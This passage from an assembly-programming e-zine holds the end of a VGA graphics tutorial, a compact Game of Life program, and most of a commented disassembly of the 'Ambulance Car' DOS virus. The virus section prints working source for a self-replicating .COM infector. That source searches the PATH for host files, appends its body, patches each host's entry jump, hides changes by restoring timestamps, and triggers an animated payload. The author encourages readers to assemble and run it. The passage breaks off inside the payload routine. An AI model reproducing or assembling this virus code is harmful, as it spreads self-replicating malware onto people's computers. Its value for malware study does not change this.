pixels and the last pixel to plot is pixel 2 (or bit 5). We need some variables to calculate how to proceed with this in the shortest possible time. This needs some calculations, so for short lines the math overhead is more work than the actual plotting will take up. First 1 2 3 ... K Last ; byte in video memory ......## ######## ######## ###...### ###..... ; # = pixel to be set We first need to know the E-value which describes the number of pixels to plot in the very first byte. The E-value is calculated as follows: E-val = 8 - ((CurrX + Win_X) AND 7) Now we know the number of pixels to plot in the very first VGA memory location. It would however come in handy if we would know with which plotting mask this would correspond. That's why we use it to derive the E-mask: E-mask = FF shr ((8 - E-val) AND 7) Next we need to know how many pixels there need to be plotted in the last memory location. L-value and L-mask are determined as follows: L-val = (Total - E-val) AND 7 L-mask = 080 sar L-val With the SAR we shift signbits to the right until the number of pixels corresponds with the number of bits in the mask. The last parameter we need to know is the actual speeding-up part: the full bytes that can be plotted. The octet-part of the routine. We do this as follows: K-val = (T - E-val - L-val)/8 Now it also becomes clear why I kept the E-val and L-val parameters. They're just needed for getting the right value for K-val. There is, however one exceptional situation. Suppose the line we need to plot is 26 pixels long, starting at pixel 6. This would produce the values: E-val = 2 E-mask = 00000011 L-val = (26 - 2) AND 7 = 24 AND 7 = 0 L-mask = 00000000 K-val = (26 - 2 - 0)/8 = 3 So, if the line ends on a byte boundary, we may NOT try to plot of pixels past it (in a plotting loop that starts with CX = 0). What the H_line procedure does is no more than what I decribed above. Here comes the source: -------- H_Line -------------------------------- Start ----------- L0: mov cx, [di.DeltaX] ; do a short line L1: call PlotPix ; by just repeating a single pixel- inc [di.CurrX] ; plot and update of CurrX loop L1 ; until done pop es, cx, bx, ax ret H_Line: push ax, bx, cx, es ; optimized horizontal line drawing cmp [di.DeltaX], 17 ; too few pixels for a bulk draw? jb L0 mov cx, [di.CurrX] ; do a long line add cx, [di.Win_X] ; first get the E-value as described and cx, 0111xB ; above mov bx, 8 sub bx, cx mov [E_val], bx ; pixels to plot in leftmost byte mov al, 0FF ; now compose the mask to use there shr al, cl mov [E_mask], al ; and store it in memory mov cx, [di.DeltaX] ; CX = length of line sub cx, [E_val] ; compensate for first-byte pixels mov ax, cx and ax, 0111xB ; this many pixels in rigthmost byte mov [L_val], ax ; and store it in memory sub cx, ax ; CX = number of pixels inbetween shr cx, 3 ; divide by 8 pixels per byte mov [K_val], cx ; number of "full" bytes to plot clr al ; AL := 0 mov cx, [L_val] ; prepare to compose L-mask cmp cx, 0 ; any bits in "last byte" IF ne mov al, bit 7 ; if any bits, setup AH register dec cx ; compensate for pixel 0, ... sar al, cl ; ... compose plotting mask and ... mov [L_mask], al ; ... store it into memory. ; that's it. Let's plot! call VGaddr ; load BX with address of byte in ; VGA memory mov ah, [E_mask] call SetMask ; set plotting mask and ... call VgaPlot ; ... plot leftmost part inc bx ; get adjacent address mov cx, [K_val] ; prepare for bulk-filling jcxz >L4 ; if nothing to do, jump out mov ah, 0FF ; else set ALL PIXELS mask call SetMask L3: call VgaPlot ; plot middle part inc bx loop L3 ; until done L4: mov ah, [L_mask] call SetMask call VgaPlot ; plot remaining pixels mov ax, [di.DeltaX] add [di.CurrX], ax ; make sure CurrX is updated pop es, cx, bx, ax ; and git outa'here ret -------- H_Line --------------------------------- End ------------ The preparations are the bulk of the work, but after that is done, the line is plotted with the lowest amount of I/O overhead. Vertical lines. --------------- Vertical lines are simply plot by repeatedly calling PlotPix. It's so simple that neither need nor want to elaborate on it: -------- VertLin ------------------------------- Start ----------- VertLin: push cx ; draw a vertical line mov cx, [di.DeltaY] L0: call PlotPix inc [di.CurrY] ; adjust Y coordinate loop L0 ; but not X value! pop cx ret -------- VertLin -------------------------------- End ------------ What to do with linedrawing functions? -------------------------------------- Now that we can draw lines, we can also draw boxes and window borders. This all looks very professional and the overview of a program is enhanced considerably. Try to figure out how to make the box-drawers by yourself. Plotting text. -------------- Now that we have windows that can be put at any plotting position, we also need to be able to position text at any position. It doesn't look nice if different windows force text to default to byte boundaries. And with the experience we got from the H_line function, we are able to make a character plotter that puts text on screen at ANY position. I use a 9 x 16 character set. The nineth bit is just always blank, but it enhances readability considerably. The pixels in the bitmap are all 8 bits wide and 16 pixels tall. In exceptional cases, the bitmaps can be plotted at byte boundaries. In 85+ % of the time this will not be the case. Therefore I do the following: - do some positioning math first - repeat 16 times: - load the byte of the bitmap in AH - shift AX to the right the correct number of pixels - plot the AH part - if plotting on a byte boundary, we're done, else - repeat 16 times: - load the byte of the bitmap in AH - shift AX to the right the correct number of pixels - plot the AL part Let's just have a look: -------- PutChar ------------------------------- Start ----------- L0: add [di.CurrY], 16 ; process 'LF' L1: pop es, si, cx, bx ret L2: mov bx, [di.Indent] ; process 'CR' mov [di.CurrX], bx jmp L1 PutChar: push bx, cx, si, es ; print char in al at (x,y) cmp al, lf je L0 cmp al, cr je L2 mov bx, [di.CurrX] add bx, CHR_WID cmp bx, [di.Win_wid] ; still safe to print character? jbe >L3 ; if so, skip over this part mov bx, [di.Indent] mov [di.CurrX], bx ; mimick 'CR' add [di.CurrY], 16 ; mimick 'LF' L3: mov cx, [di.CurrX] add cx, [di.Win_X] and cx, 0111xB mov [C_val], cl ; store shiftcount for masks mov bx, 0FF00 shr bx, cl ; setup plotting mask and ... mov [P_mask], bx ; ... store it clr ah ; ax = ASCII code mov si, ax ; make address of pixels in bitmap shl si, 4 add si, offset bitmap call VGaddr ; bx = -> in video memory mov ax, [P_mask] ; only the AH part is used ... call SetMask ; ... here. mov cx, 16 ; 16 pixel lines per token L4: push cx ; we're in the loop now mov ah, [si] ; AH = pixelpattern clr al ; AL = empty mov cl, [C_val] ; get shiftcount shr ax, cl ; distribute pixelBYTE across a WORD mov cl, [es:bx] ; dummy read, CL is expendable mov [es:bx], ah ; actual plotting of this half add bx, 80 ; point to next pixelbyte address inc si ; next pixeldata address pop cx loop L4 ; and loop back sub bx, 16 * 80 - 1 ; back to original position mov ax, [P_mask] cmp al, 0 ; if nothing to do, ... je >L6 ; ... skip this chapter mov ah, al ; else repeat the lot for the right- call SetMask ; most pixels.... mov cx, 16 sub si, cx ; correct SI L5: push cx mov ah, [si] clr al mov cl, [C_val] shr ax, cl mov cl, [es:bx] mov [es:bx], al add bx, 80 inc si pop cx loop L5 L6: add [di.CurrX], CHR_WID ; adjust CurrX value before ... jmp L1 ; ... getting a hike -------- PutChar -------------------------------- End ------------ So far for plotting text. This routine will dump any character in any place of the graphics screen. But it needs a CurrX and a CurrY value to know where to plot things. This is both an advantage and a disadvantage. The advantage is that we can plot ANYWHERE we like. The disadvantage is that we need to elaborately specify CurrX and CurrY before the text is where we would like to have it. That's why I made the constrcut with the Topic and TopicEnd macro's, as described above. Here comes the code for printing a table on screen. We spent a lot of time on the preparations, and this is the stage where it is going to pay off. Look how much code we need for printing neat sets of tokens and characters on screen. -------- Print --------------------------------- Start ----------- print: mov ah, [di.TxtCol] ; print a table of text call SetColr L0: lodsw ; get Xpos cmp ax, 0F000 ; end of table? je ret ; exit, if so mov [di.CurrX], ax lodsw ; get Ypos mov [di.CurrY], ax L1: lodsb ; get text cmp al, 0 je L0 call putchar ; and print it jmp L1 ; until this line is done -------- Print ---------------------------------- End ------------ Wit this approach, and starting from a working (empty) framework of routines, you can design the userinterface of your software within the hour. And it will look just fine. The actual code is then the only thing you need to worry about..... Having such routines, which have been tested and found reliable, you make the user interface easily and are able to concentrate on the actual coding the maximum amount of time. If the screen needs another layout (since you couldn't realize the function you considered), just change a few entries in the table. Many times just the X or Y values need some adjustment for better lining up, or for regrouping. No need to worry about the order of the plotting. Just make sure that the correct window is selected (for the colours) and that the table is terminated by a TopicEnd. Conclusion. ----------- So far my elaboration on the VGA mode 12h. Again, I would rather use 800 x 600 but that mode is not standardised. VGA 12h is standard on all VGA cards, so it's the best we can universally get and for many applications it is more than enough. Please try to make the BoxDrawing function. I will submit the "solution" to the next issue. For future issues I will start working on an explanation about mouse-usage. This little rodent is nice to control many applications. If the screen is well layed out, you don't need the keyboard for data entry. Just drag the mouse along the screen and poke him in the eye. The bitmap data for the character generator can be obtained from http://asmjournal.freeservers.com/supplements/univ-vmode.html where the complete text of the article has been archived. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Conway's Game of Life by Laura Fairhead I had the idea for this one day after stumbling upon a "gem" that somebody had written to play life. It was small and fast and reminded me of years ago when I had written many versions of this for the BBC Master 128 (my love lost). Since I had never written a version for the PC I thought that I would, and ended up spending some hours trimming off the bytes until it is now :- 156 bytes long. I must admit if it was not for the program that I found, this program would have been MUCH slower than it is. After I had written the code I tested it against the program that I had found and to my perplexity it was a great deal slower. After some hours of frustration I found the reason:- my program was accessing the video memory to do the bulk of its work. This must have brought about a factor of 12 decrease in speed!! Life is a classic game of cellular automata by John Conway. It is played on an nxn grid of squares. Each square may be occuppied by a cell or empty. Each 'go' of the game the player calculates the next generation of a colony of cells by applying three simple rules:- (i) a cell with less than 2 or more than 3 neighbours dies (ii) a cell with 2 or 3 neighbours survives (iii) a cell is born in a square with exactly 3 neighbours A neighbouring square is one diagonally adjacent as well as the normal horizontal/vertical so each square has 8 neighbouring squares. Overview of the code ~~~~~~~~~~~~~~~~~~~~ First, note that if we define S:=state of square in this generation (0=empty, 1=occupied) N:=number of neighbours S':=state of square in the next generation then according to the rules S'={0, if N<2 or N>3 {1, if (N=2 or N=3) and S=1 {1, if N=3 so S'=1 iff (N=2 and S=1) or N=3 this can be simplified using bitwise-OR to the dramatically simple: S'= ( N|S=3 ) note: iff means "if and only if" "A iff B" means that A => B and B => A The code uses one big array with one byte for each square that starts just after the program end. To save space it just assumes that it can use this memory since this is generally okay. However this is very bad practice really and it should use AH=04Ah/int 021h to adjust the memory size and abort if not successful. The big array actually serves the purpose of 2 arrays; bit0 of a byte indicates the state of the square in the current generation. bit4 of each byte indicates the state of the square in the next generation. After initialisation, generation 0 is calculated by filling about 1/4 of the array with 1's. Now we do a loop to get the next generation. The screen is 0140h bytes across and 0C8h bytes down. Therefore:- -0141h -0140h -013Fh -0001h . +0001h +013Fh +0140h +0141h If DI is the offset of the array which we are calculating for, note that the neighbours can be summed as follows:- MOV AX,[DI-0141h] ADD AL,[DI-013Fh] ADD AX,[DI+013Fh] ADD AL,[DI+0141h] ADD AL,[DI-1] ADD AL,[DI+1] ADD AL,AH Note that if bit4 of any of the neighbours was set then we would still have the correct total in the least significant 4 bits of AL. So from here the new cell state can be calculated simply:- OR AL,[DI] AND AL,0Fh CMP AL,3 And if ZF=1 now we have a set cell. JNZ ko OR BYTE PTR [DI],010h ko: When the next generation has been calculated we have done most of the work. The only thing is that if we want to iterate we need all of those bit4 's moved to bit0, also we want to display the next generation, this can be done easily at the same time. Note that due to the structure of the code generation#0 is never displayed. Also we always have blue cells. Despite this it is quite an entertaining little program to watch.... The source here is in MASM format but should be trivial to convert to run on any assembler. It is assembled into a .COM file which means you should use the /T option on the linker (T=tiny). ===========START OF CODE=================================================== OPTION SEGMENT:USE16 .386 cseg SEGMENT BYTE ASSUME NOTHING ORG 0100h kode PROC NEAR ; ;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack ; MOV SP,0100h MOV AX,013h INT 010h ; ;use current time as random number seed ;in BP,DX which is used later ; MOV AH,02Ch INT 021h MOV BP,CX ; ;get seg address of 1st seg after code for array store start ;for now ES points there and DS=screen ; MOV AX,DS ADD AX,01Ah ;(OFFSET endofprog+0Fh>>4)=(1A) MOV ES,AX MOV AX,0A000h MOV DS,AX ; ;CREATE GENERATION#0 ; this is done by filling approx 1/4 of the cells in the array ; 'randomly', while taking care not to fill any edge cells ; ; ;blank the array ; this is done to ensure the edge cells are clear ; XOR DI,DI MOV CX,0FA00h REP STOSB ; ;fill the array ; two nested loops, CL counts the rows, SI counts the columns ; this is so that after each row DI can be bumped past the edge ; MOV CL,0C6h MOV DI,0141h ;array offset we are addressing ; ;BX is 0141h from now until exit, it is used as a constant later ; MOV BX,DI lopr0: MOV SI,-013Eh ; ;iterate random number seed in BP,DX ; lopr: LEA AX,[BP+DI] ROR BP,3 XOR BP,DX SUB DX,AX ; ;set cell with probability 1/4 ; CMP AL,0C0h SBB AL,AL INC AX STOSB ; ; INC SI JNZ lopr SCASW ;DI+=2, skipping edge LOOP lopr0 ; ;now we set DS=array, ES=screen. this doesn't change until exit ; PUSH ES PUSH DS POP ES POP DS ;DS=vseg,ES=0A000h throughout ; ;'mlop' is the main loop, outputting generations until the user terminates ; mlop: ; ;CREATE NEXT GENERATION ; MOV DI,BX ;DI=0141h ; ;'lopy' is the loop for rows, a count is not needed because we can get ;the stop point from testing the array offset DI ; lopy: MOV SI,013Eh ; ;'lopx' is the loop for columns, SI holds the count ; ; ;get the total number of neighbours into the least significant 4 bits of AL ; lopx: MOV AX,[DI-0141h] ADD AL,[DI-013Fh] ADD AX,[DI+BX-2] ADD AL,[DI+BX] ADD AL,[DI-1] ADD AL,[DI+1] ADD AL,AH ; ;calculate new cell state ; OR AL,[DI] AND AL,0Fh CMP AL,3 JNZ SHORT ko OR BYTE PTR [DI],010h ko: INC DI DEC SI JNZ lopx ; ;(each row we miss 2 edge cells) ; SCASW CMP DI,0FA00h-013Fh JC lopy ; ;FIXUP ARRAY AND DISPLAY ; bit4 is copied to bit0 in each byte. all other bits then cleared so ; cells appear as blue pixels, also the iteration loop above assumes ; that bit4 is clear on entry (it only sets it) ; MOV CX,03E80h XOR DI,DI lopc: LODSD SHR EAX,4 AND EAX,01010101h MOV [SI-4],EAX STOSD LOOP lopc ; ;USER KEYPRESS? ; MOV AH,0Bh INT 021h ADD AL,3 ; ;no, back for next generation ; JP mlop ; ;yes, AL=2 now so make AX=2 to go into text mode ; CBW INT 010h ; ;back to DOS ; MOV AH,04Ch INT 021h kode ENDP endof EQU $ cseg ENDS END FAR PTR kode ===========END OF CODE===================================================== While the code is optimised for size and for speed you may find that it runs too quickly. This can be easily remidied by the addition of a wait for vertical synchronisation loop (or vert sync as we techies call it). Just add the following after the generation calculating code (that is after the instruction 'JC lopy'):- MOV DX,03DAh lopv0: IN AL,DX AND AL,8 JNZ lopv0 lopv1: IN AL,DX AND AL,8 JZ lopv1 Also if you add this the program size has changed. 'endofprog' is now 01ABh, so the number of segments to add to DS to get the start of free space is now 01Bh. You must change the instruction at the beginning of the code:- MOV AX,DS ** ADD AX,01Bh ;(OFFSET endofprog+0Fh>>4)=(1B) ** MOV ES,AX One final note: I use SCASW in this code to increment DI by two. This is a well known space saving trick. However you must be wary since it does not do just that; it reads the memory at ES:[DI]. Generally this is fine but if DI=0FFFFh we will get a general protection fault. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE 'Ambulance Car' Disassembly by Chili This virus has definitely my favourite payload of all times. I just love seeing that little ambulance run across the screen with a 'siren' playing at the same time. Other than that, the virus itself isn't much of a thing. Don't forget though, that it is dated back to at least 1990. It is a non-resident .COM infector, and each time an infected file is run it will attempt to infect two files (be it in the current directory or in a directory located in the PATH) in a parasitic manner. Infected files will experience a 796 bytes growth, being the main virus body appended to the end of the host. Also the host file's date and time will be preserved. On ocasion the virus will display the 'ambulance car' payload. The virus doesn't preserve the initial contents of AX and so programs like HotDIR fail to run when infected. Also if there is any reference to 'PATH' in the environment block before the actual PATH string the virus will assume that to be the actual PATH (i.e. 'CLASSPATH=...'). Playing it safe --------------- At the DOS prompt type "PATH ;" so that the virus will only infect files in the current directory and you can keep track of things. Also if all you want to do is see the payload, then comment the following lines in the source code (right after the delta offset calculation) so that no files are infected: call search_n_infect call search_n_infect Moreover you should comment the lines presented below (for the 'RedXAny' strain look-alike) so that the payload is shown everytime the virus is run. In case things start to get out of hand, you should do one of three things: either disinfect the files yourself with an hex editor, use the latest version of F-PROT (available from ftp.complex.is or through Simtel and Garbo) to scan and clean the infected files or use my own disinfector (in another article) to clean this specific strain. [NOTE: F-PROT will report the strain whose source code is presented as Ambulance.796.D] Keep in mind that this virus is not destructive, so feel free to go ahead and infect your entire computer (you really shouldn't do this, since accidents can sometimes happen!). Strains ------- A 'RedXAny' strain look-alike can be obatined by commenting the following lines (both in the 'payload' procedure): jne exit_payload ; (starting with the sixth) jnz exit_payload ; don't show payload [NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves in the same manner - always shows the ambulance car] Other strains exist, but will not be discussed here, has nothing of interest would be added. Compatibility ------------- The virus runs ok in a Win95's DOS box. Also, remember that for the payload to be apreciated in full, a PC Speaker is required. Bad luck for those of you who don't have a computer with one... Here is the disassembly: --8<--------------------------------------------------------------------------- ; Ambulance Car (aka Ambulance, RedX, Red Cross) ; Ambulance-B strain (or so it seems!) ; Disassembly by Chili for APJ #6 ; Byte for byte match when assembled with TASM 4.1 ; Assemble with: ; tasm /ml /m2 ambul-b.asm ; tlink /t ambul-b.obj PSP_environment_seg equ 2Ch ; PSP location of process' environment ; block segment address BDA_addr equ 40h ; BDA (Bios Data Area) segment address BDA_LPT3_port_addr equ 0Ch ; BDA location of LPT3 I/O port base ; address BDA_video_mode equ 49h ; BDA location of current video mode BDA_timer_counter equ 6Ch ; BDA location of number of timer ticks ; (18.2 per second) since midnight _TEXT segment word public 'code' assume cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT org 100h ; Host and virus' main body ;-------------------------- ambulance_car proc far ; Jump over host to real beginning of virus db 0E9h, 01h, 00h ; Harcoded relative near jump ; Host (missing the first 3 bytes) ; ; Dummy host is just 4 bytes so only a 'nop' here host: nop ; Calculate the delta offset ; ; This piece of code will 'fool' some disassemblers and so it will appear as: ; ; call $+4 ; add [bp-7Fh], bx ; out dx, al ; add ax, [bx+di] ; ; Pretty basic, but could turn out to be somewhat annoying if used all over the ; place (for the person doing the disassembly, that is!) ; ; (because of 'db 01h'; used since the near jump above is also 3 bytes long ; and that has to be taken into account for the displacement calculation) real_start: call find_displacement db 01h ; Used to make this add up to 3 bytes find_displacement: pop si sub si, offset host ; Infect twice then load up the payload call search_n_infect call search_n_infect call payload ; Restore host's original first 3 bytes lea bx, [si+original_3bytes-4] mov di, offset ambulance_car mov al, [bx] mov [di], al ; Restore 1st byte mov ax, [bx+1] mov [di+1], ax ; Restore 2nd and 3rd bytes ; Return control to host jmp di ; Move on to next step (be it 'search_n_infect' or 'payload') next_step: retn ambulance_car endp ; Search for a file and infect it ;-------------------------------- search_n_infect proc near ; Search for the file call search ; Found any file? mov al, byte ptr [si+file_mask-4] or al, al ; If not, then move on to the jz next_step ; next step ; Increase 'opened files' counter lea bx, [si+counter-4] inc word ptr [bx] ; Open file in read/write mode (AL - 02h) lea dx, [si+filename-4] ; Open a File mov ax, 3D02h ; [on entry AL - Open mode; int 21h ; DS:DX - Pointer to filename ; (ASCIIZ string)] ; [returns AX - File handle] ; Save file handle mov word ptr [si+file_handle-4], ax ; Read file's first 3 bytes mov bx, word ptr [si+file_handle-4] mov cx, 3 ; Read from File or Device, lea dx, [si+first_3bytes-4] ; Using a Handle mov ah, 3Fh ; [on entry BX - File handle; int 21h ; CX - Number of bytes to ; read; DS:DX - Address of ; buffer] ; Check if already infected mov al, byte ptr [si+first_3bytes-4] cmp al, 0E9h ; Is first byte a near jump? jne infect ; If not, assume virus isn't ; here, so go ahead and infect ; Move file pointer to real virus start (pointed to by the initial near jump) mov dx, word ptr [si+first_3bytes+1-4] mov bx, word ptr [si+file_handle-4] add dx, 3 ; Add 3 bytes to account for ; the near jump xor cx, cx ; Move File Pointer (LSEEK) mov ax, 4200h ; [on entry BX - File handle; int 21h ; CX:DX - Offset, in bytes; ; AL - Mode code ( Move ; pointer CX:DX bytes from ; beginning of file, AL - 0)] ; Read first 6 bytes from that location mov bx, word ptr [si+file_handle-4] mov cx, 6 lea dx, [si+six_bytes-4] mov ah, 3Fh ; Read from File or Device, int 21h ; Using a Handle ; Double-check if already infected ; ; Compares the bytes read with the first part of the displacement calculation ; code mov ax, word ptr [si+six_bytes-4] mov bx, word ptr [si+six_bytes+2-4] mov cx, word ptr [si+six_bytes+4-4] cmp ax, word ptr [si+ambulance_car] jne infect cmp bx, word ptr [si+ambulance_car+2] jne infect cmp cx, word ptr [si+ambulance_car+4] je close_file ; If already infected, then go ; ahead and close the file infect: ; Reset file pointer to end of file (AL - 2) mov bx, word ptr [si+file_handle-4] xor cx, cx xor dx, dx ; Move File Pointer (LSEEK) mov ax, 4202h ; [returns DX:AX - New pointer int 21h ; location] ; Calculate virus' near jump relative offset sub ax, 3 ; Account for the near jump mov word ptr [si+relative_offset-4], ax ; Get and save file's date and time (AL - 0) mov bx, word ptr [si+file_handle-4] mov ax, 5700h ; Get a File's Date and Time int 21h ; [on entry BX - File handle] push cx ; [returns CX - Time; DX - push dx ; Date] ; Write virus body to end of file mov bx, word ptr [si+file_handle-4] mov cx, virus_body - real_start lea dx, [si+ambulance_car] ; Write to a File or Device, mov ah, 40h ; Using a Handle int 21h ; [on entry BX - File handle; ; CX - Number of bytes to ; write; DS:DX - Address of ; buffer] ; Write host's first 3 bytes to after virus body mov bx, word ptr [si+file_handle-4] mov cx, 3 lea dx, [si+first_3bytes-4] mov ah, 40h ; Write to a File or Device, int 21h ; Using a Handle ; Move file pointer to beginning of file mov bx, word ptr [si+file_handle-4] xor cx, cx xor dx, dx mov ax, 4200h ; Move File Pointer (LSEEK) int 21h ; Write jump-to-virus-body code to beginning of file mov bx, word ptr [si+file_handle-4] mov cx, 3 lea dx, [si+jump_code-4] mov ah, 40h ; Write to a File or Device, int 21h ; Using a Handle ; Reset file's date and time to previous (AL - 1) pop dx pop cx mov bx, word ptr [si+file_handle-4] mov ax, 5701h ; Set a File's Date and Time int 21h ; [on entry BX - File handle; ; CX - Time; DX - Date] close_file: mov bx, word ptr [si+file_handle-4] mov ah, 3Eh ; Close a File Handle int 21h ; [on entry BX - File handle] retn search_n_infect endp ; Find a file to infect, in the PATH or in the current directory ;--------------------------------------------------------------- search proc near mov ax, ds:PSP_environment_seg mov es, ax push ds mov ax, BDA_addr mov ds, ax mov bp, ds:BDA_timer_counter pop ds ; Where to infect ; ; Probability of infecting in the current directory (none of the first two ; lower bits of BP being set) is 1/4 (25%), while probability of searching in ; the PATH for a directory where to infect (one or both of the first two lower ; bits of BP being set) is 3/4 (75%) test bp, 00000011b ; Check if we are to infect in jz check_cur_dir ; the current directory or in ; a PATH directory ; Find the PATH string in the environment block ; ; Format of environment block (from Ralph Brown's Interrupt List): ; ; Offset Size Description ; ------ ---- ----------- ; 00h N BYTEs first environment variable, ASCIIZ string of form "var=value" ; N BYTEs second environment variable, ASCIIZ string ; ... ; N BYTEs last environment variable, ASCIIZ string of form "var=value" ; BYTE 00h ;---DOS 3.0+ --- ; WORD number of strings following environment (normally 1) ; N BYTEs ASCIIZ full pathname of program owning this environment ; (other strings may follow) xor bx, bx ; Point to the first character check_if_PATH: mov ax, es:[bx] cmp ax, 'AP' jne not_PATH cmp word ptr es:[bx+2], 'HT' je PATH_found not_PATH: inc bx or ax, ax ; Check if both AH and AL are jnz check_if_PATH ; equal to zero (meaning the ; standard environment block ; is over) ; Setup to check in the current directory check_cur_dir: lea di, [si+file_mask-4] ; Point to file mask holder jmp short find_file ; Find a directory in the PATH PATH_found: add bx, 5 ; Point to after 'PATH=' find_dir: lea di, [si+pathname-4] ; Point to PATH name holder get_character: mov al, es:[bx] inc bx or al, al ; Are we at the end of this jz patch_dir ; PATH string? cmp al, ';' ; Is this a PATH directory je check_if_this_one ; separator? mov [di], al ; Write this character to the inc di ; PATH name holder jmp short get_character check_if_this_one: cmp byte ptr es:[bx], 0 ; Are we at the end of this je patch_dir ; PATH string? shr bp, 1 ; Get rid of the first two shr bp, 1 ; lower bits, because it's ; already known that at least ; one them is set ; Which directory to choose ; ; Probability of infecting in the found directory (none of the first two ; lower bits of BP being set) is 1/4 (25%), while probability of searching in ; the PATH for another directory where to infect (one or both of the first two ; lower bits of BP being set) is 3/4 (75%) test bp, 00000011b ; Check if we are to search for jnz find_dir ; files in this directory or ; not patch_dir: cmp byte ptr [di-1], '\' ; Does the directory already je find_file ; have an ending '\'? mov byte ptr [di], '\' ; If not, then add one inc di ; Find a file to infect find_file: push ds pop es mov [si+filename_ptr-4], di ; Save current location within ; the pathname/file_mask mov ax, '.*' ; Set file mask stosw mov ax, 'OC' stosw mov ax, 'M' stosw push es mov ah, 2Fh ; Get Disk Transfer Address int 21h ; (DTA) ; [returns ES:BX - Address of ; current DTA] mov ax, es mov word ptr [si+DTA_seg-4], ax ; Save DTA segment mov word ptr [si+DTA_off-4], bx ; Save DTA offset pop es lea dx, [si+new_DTA-4] ; Setup new DTA mov ah, 1Ah ; Set Disk Transfer Address int 21h ; [on entry DS:DX - Address of ; DTA] lea dx, [si+file_mask-4] ; Setup file mask (with or ; without a PATH directory) xor cx, cx ; Search for normal files only mov ah, 4Eh ; Find First Matching File int 21h ; [on entry CX - File ; attribute; DS:DX - pointer ; to filespec (ASCIIZ string) jnc file_found ; File found? (and no errors?) ; If no file found, then clear the file mask xor ax, ax mov word ptr [si+file_mask-4], ax jmp short restore_DTA ; Check if we are to infect this file or find another one ; ; Probability of keeping the found file is 1/8 (12.5%) while probability of ; searching for another one is 7/8 (87.5%) file_found: push ds mov ax, BDA_addr mov ds, ax ror bp, 1 xor bp, ds:BDA_timer_counter pop ds test bp, 00000111b jz file_picked ; Keep this file? ; If not, then... mov ah, 4Fh ; Find Next Matching File int 21h jnc file_found ; File found? (and no errors?) ; Either a file was picked or no more files where found (so keep last one) file_picked: mov di, [si+filename_ptr-4] ; Point to after path, if any lea bx, [si+f_name-4] ; Copy the file name of the found file to our filename/pathname holder store_filename: mov al, [bx] inc bx stosb or al, al ; Is the file name over? jnz store_filename ; If not, then copy the next ; character restore_DTA: mov bx, word ptr [si+DTA_off-4] ; Get old DTA offset mov ax, word ptr [si+DTA_seg-4] ; Get old DTA segment push ds mov ds, ax mov ah, 1Ah ; Set Disk Transfer Address int 21h pop ds retn search endp ; Check if payload will be shown or not ;-------------------------------------- payload proc near ; Check if payload will be shown ; ; The payload will be shown only when the counter-of-opened-files matches ; ...x110 (in binary) which happens at: 6, 14, 22, 30, 38, ... 65534. Then, ; when the counter reaches its limit (65535) and goes back to zero, everything ; starts again. So probability of the payload being shown is 1/8 (12.5%) and ; of not is 7/8 (87.5%) push es mov ax, word ptr [si+counter-4] and ax, 00000111b cmp ax, 00000110b ; Show payload every eight jne exit_payload ; (starting with the sixth) ; time ; Did we already show the payload? (since the computer was (re)booted) mov ax, BDA_addr mov es, ax mov ax, es:BDA_LPT3_port_addr or ax, ax ; If the LPT3 port is in use, jnz exit_payload ; don't show payload ; Mark LPT3 port as in use, so that the payload won't be shown again inc word ptr es:BDA_LPT3_port_addr call show_payload exit_payload: pop es retn payload endp ; Setup and show the 'ambulance car' payload ;------------------------------------------- show_payload proc near ; Check video mode ; ; Text mode 3 (80x25) - video buffer address = 0B800h ; Text mode 7 (80x25) - video buffer address = 0B000h push ds mov di, 0B800h mov ax, BDA_addr mov ds, ax mov al, ds:BDA_video_mode cmp al, 7 ; Check which video mode we're jne setup_video_n_tune ; on, if not Monochrome text mov di, 0B000h ; mode 7, assume mode 3 setup_video_n_tune: mov es, di pop ds mov bp, 0FFF0h ; Setup number of tones to play ; (will increment up to 50h) setup_animation: mov dx, 0 ; Setup ambulance_data column mov cx, 16 ; Number of characters that make ; up one ambulance_data line do_ambulance: call show_ambulance ; Print the ambulance to screen inc dx loop do_ambulance call play_siren ; Play a tone of the 'siren' call wait_tick ; and wait for a tick inc bp cmp bp, 50h ; Already played the 'ambulance jne setup_animation ; siren' tune 12 times? call speaker_off ; If yes, then turn speaker off push ds pop es retn show_payload endp ; Turn the PC speaker off ;------------------------ speaker_off proc near ; Turn off the speaker ; ; 8255 PPI - Programmable Peripheral Interface ; Port 61h, 8255 Port B output ; ; (see description below) in al, 61h and al, 11111100b ; Disable timer channel 2 and 'ungate' out 61h, al ; its output to the speaker retn speaker_off endp ; Turn on the speaker and play the "ambulance siren" sound ;------------------------------------------------------------ play_siren proc near ; Select tone frequency to generate ; ; Tone frequency is selected by means of the 3rd least significant bit of BP: ; ; Bit(s) Description ; ------ ----------- ; ... 3 2 1 0 ; ... x 0 x x Play 1st tone frequency ; ... x 1 x x Play 2nd tone frequency ; ; If we consider A to be the 1st tone and B to be the 2nd tone then the whole ; 'ambulance siren' tune will be: (AAAABBBB) x 12 mov dx, 07D0h ; "ambulance siren" 1st tone frequency test bp, 00000100b ; Check if we are to play jz speaker_on ; the first or the second ; tone frequency mov dx, 0BB8h ; "ambulance siren" 2nd tone frequency ; Turn on the speaker ; ; 8255 PPI - Programmable Peripheral Interface ; Port 61h, 8255 Port B output ; ; Bit(s) Description ; ------ ----------- ; 7 6 5 4 3 2 1 0 ; . . . . . . . 1 Timer 2 gate to speaker enable ; . . . . . . 1 . Speaker data enable ; x x x x x x . . Other non-concerning fields speaker_on: in al, 61h test al, 00000011b ; If speaker is already on, then go and jnz play_tone ; play the sound tone or al, 00000011b ; Else, enable timer channel 2 and out 61h, al ; 'gate' its output to the speaker ; Program the PIT ; ; 8253 PIT - Programmable Interval Timer ; Port 43h, 8253 Mode Control Register ; ; Bit(s) Description ; ------ ----------- ; 7 6 5 4 3 2 1 0 ; . . . . . . . 0 16 binary counter ; . . . . 0 1 1 . Mode 3, square wave generator ; . . 1 1 . . . . Read/Write LSB, followed by write of MSB ; 1 0 . . . . . . Select counter (channel) 2 mov al, 10110110b ; Set 8253 command register out 43h, al ; for mode 3, channel 2, etc ; Generate a tone from the speaker ; ; 8253 PIT - Programmable Interval Timer ; Port 42h, 8253 Counter 2 Cassette and Speaker Functions play_tone: mov ax, dx out 42h, al ; Send LSB (Least Significant Byte) mov al, ah out 42h, al 